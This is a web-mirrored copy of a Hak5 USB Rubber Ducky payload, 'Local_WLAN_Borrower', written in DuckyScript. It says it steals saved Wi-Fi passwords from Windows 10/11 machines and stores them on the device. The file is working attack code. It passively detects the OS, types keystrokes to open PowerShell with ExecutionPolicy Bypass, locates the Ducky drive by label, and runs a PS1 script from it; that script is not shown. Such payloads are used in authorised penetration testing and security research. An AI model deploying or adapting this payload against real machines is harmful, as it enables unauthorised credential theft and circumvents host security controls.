Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/credentials/Local_WLAN_Borrower/payload.txt
2968 views
1
REM Title:         Local_WLAN_Borrower

2
REM Description:   Borrows wifi passwords and saves them on the DUCKY

3
REM Author:        YEETBOY0330

4
REM Props:         Zero_Sploit(DUCKY-WIFI-GRABBER) + Hak5 Team

5
REM Version:       1.0

6
REM Category:      Creds

7
REM Target:        Windows 10 & 11

8
REM Attackmodes:   HID, STORAGE

9


10
ATTACKMODE HID STORAGE

11
DEFAULTDELAY 20

12


13
EXTENSION PASSIVE_WINDOWS_DETECT

14
    REM VERSION 1.1

15
    REM AUTHOR: Korben

16


17
    REM_BLOCK DOCUMENTATION

18
        Windows fully passive OS Detection and passive Detect Ready

19
        Includes its own passive detect ready.

20
        Does not require additional extensions.

21


22
        USAGE:

23
            Extension runs inline (here)

24
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic

25
            boot delay

26
            $_OS will be set to WINDOWS or NOT_WINDOWS

27
            See end of payload for usage within payload

28
    END_REM

29


30
    REM CONFIGURATION:

31
    DEFINE #MAX_WAIT 150

32
    DEFINE #CHECK_INTERVAL 20

33
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2

34
    DEFINE #NOT_WINDOWS 7

35


36
    $_OS = #NOT_WINDOWS

37


38
    VAR $MAX_TRIES = #MAX_WAIT

39
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))

40
        DELAY #CHECK_INTERVAL

41
        $MAX_TRIES = ($MAX_TRIES - 1)

42
    END_WHILE

43
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN

44
        $_OS = WINDOWS

45
    END_IF

46


47
    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION

48
        IF ($_OS == WINDOWS) THEN

49
            STRING HELLO WINDOWS!

50
        ELSE

51
            STRING HELLO WORLD!

52
        END_IF

53
    END_REM

54
END_EXTENSION

55


56
REM change this to your drive label

57
DEFINE #DRIVE_LABEL DUCKY

58
REM change this to the name of your PS1 script

59
DEFINE #PS1_FILE_NAME 1.ps1

60
IF ($_OS == WINDOWS) THEN

61
    REM Initial Delay

62
    DELAY 1000

63
    REM Opens powershell with script execution enabled

64
    GUI r

65
    DELAY 700

66
    STRINGLN powershell -ExecutionPolicy Bypass

67
    DELAY 4000

68


69
    REM Gets usb drive letter of #DRIVE_LABEL

70
    STRINGLN_POWERSHELL

71
     $targetLabel = "#DRIVE_LABEL"

72
     $volume = Get-Volume | Where-Object { $_.FileSystemLabel -eq $targetLabel }

73
     $driveLetter = $volume.DriveLetter + ":"

74
     cd $driveletter

75
    END_STRINGLN

76
    REM Runs powershell script

77
    STRINGLN .\#PS1_FILE_NAME

78


79
END_IF

80


81